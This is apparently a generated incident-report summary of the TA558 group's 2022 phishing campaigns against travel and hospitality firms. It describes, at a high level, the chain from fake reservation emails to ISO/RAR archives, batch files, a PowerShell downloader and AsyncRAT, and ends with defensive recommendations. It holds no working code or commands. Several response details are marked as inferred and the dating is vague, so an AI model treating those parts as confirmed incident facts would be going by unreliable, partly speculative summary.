Full Report
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
Analysis Summary
# Incident Report: TA558 Resurgence Targeting Travel and Hospitality with New File Formats
## Executive Summary
Long-standing threat group TA558 has dramatically increased activity targeting the travel and hospitality sectors, leveraging the post-COVID travel surge. The group has shifted its delivery mechanism from traditional Office documents exploiting vulnerabilities to using malicious ISO and RAR file attachments containing batch scripts, ultimately deploying RATs like AsyncRAT. The primary impact is potential compromise of organizational systems and customer data, driven by a financially motivated objective.
## Incident Details
- Discovery Date: Recently reported by security researchers (e.g., Proofpoint update in 2022 context).
- Incident Date: Activity ramped up significantly in 2022, building on campaigns dating back to 2018.
- Affected Organization: The travel and hospitality industries are the primary targets.
- Sector: Travel and Hospitality.
- Geography: Primarily Latin America, with activity also seen in North America and Western Europe.
## Timeline of Events
### Initial Access
- Date/Time: Increased activity noted in 2022, following a lull due to COVID restrictions.
- Vector: Socially engineered emails disguised as fake travel/hotel reservations (often titled "reserva"). In recent campaigns, the vector shifted to ISO or RAR file attachments.
- Details: Victims were tricked into clicking links leading to container files (ISO/RAR) which contained an embedded batch file (`.BAT`).
### Lateral Movement
- Details: The execution of the initial payload (via the batch file) led to a PowerShell helper script, which downloaded a follow-on payload, identified as AsyncRAT, suggesting capabilities for internal reconnaissance and movement once inside the network.
### Data Exfiltration/Impact
- Details: Payloads often included Remote Access Trojans (RATs) such as Loda, Revenge RAT, and AsyncRAT, enabling reconnaissance, data theft, and distribution of further payloads. The ultimate goal is financial gain derived from stolen data.
### Detection & Response
- Detection: Disclosures by security researchers (Proofpoint, Palo Alto Networks, Cisco Talos) tracking the group's evolution.
- Response Actions: Organizations are advised to be aware of the actor's TTPs and take necessary precautions.
## Attack Methodology
- Initial Access: Socially engineered emails containing links leading to RAR or ISO compressed files. Execution required user interaction (decompressing the archive and running the embedded script).
- Persistence: Not explicitly detailed for the recent campaigns, but RAT installation inherently establishes persistence.
- Privilege Escalation: Not explicitly detailed, though RAT functionality often includes this capability. The earlier use of RCE vulnerabilities (CVE-2017-11882) facilitated initial code execution.
- Defense Evasion: The shift from traditional macro-enabled Office documents to ISO/RAR containers is a defense evasion technique, likely in response to Microsoft disabling Office macros by default in late 2021/early 2022.
- Credential Access: Inferred via the capabilities of deployed RATs (e.g., AsyncRAT).
- Discovery: Performed by the delivered RATs to map the internal network.
- Lateral Movement: Inferred via RAT capabilities.
- Collection: Data gathering enabled by RAT deployment.
- Exfiltration: Data theft intended to scale up financial access.
- Impact: Deployment of financial-focused malware (RATs) leading to potential data theft and financial fraud.
## Impact Assessment
- Financial: High confidence that the actor is financially motivated; impact involves potential fraud or monetization of stolen data.
- Data Breach: Potential theft of organizational or customer data, especially concerning bookings and personal details within the travel sector.
- Operational: Can lead to system compromise and disruption due to RAT deployment.
- Reputational: Potential damage to targeted travel/hospitality organizations if customer data is exposed.
## Indicators of Compromise
- Network Indicators: URLs leading to ISO/RAR files were used frequently in 2022 (defanged example: `hxxp://suspicious-reservation-link.com`).
- File Indicators: Malicious ISO archives, RAR archives, Batch files (`.BAT`), Batch helper scripts, and executable payloads (e.g., AsyncRAT).
- Behavioral Indicators: PowerShell execution downloading follow-on payloads; execution triggered by decompression of container files.
## Response Actions
- Containment: (Inferred based on detection) Isolating endpoints executing suspicious batch scripts/PowerShell, and blocking C2 traffic associated with AsyncRAT.
- Eradication: (Inferred) Removing all instances of the RAT, batch scripts, and any external access established by the threat actor.
- Recovery: (Inferred) Restoring affected systems from clean backups and enforcing credential rotation.
## Lessons Learned
- Phishing evolution is rapid: Threat actors quickly adapt delivery mechanisms (shifting from macros to ISO/RAR) to circumvent security controls (e.g., macro blocking).
- Targeted sector vulnerability: The travel and hospitality sectors remain consistent, high-value targets for this financially motivated group.
## Recommendations
- Implement robust email filtering to scrutinize emails carrying ISO, RAR, or ZIP attachments, especially from external sources purporting to be related to travel bookings.
- Enhance endpoint detection and response (EDR) to monitor for suspicious PowerShell executions, particularly those triggered immediately following file decompression events.
- Ensure all email clients and operating systems are fully patched against historical vulnerabilities (like CVE-2017-11882) even though modern attacks are focused on social engineering bypasses.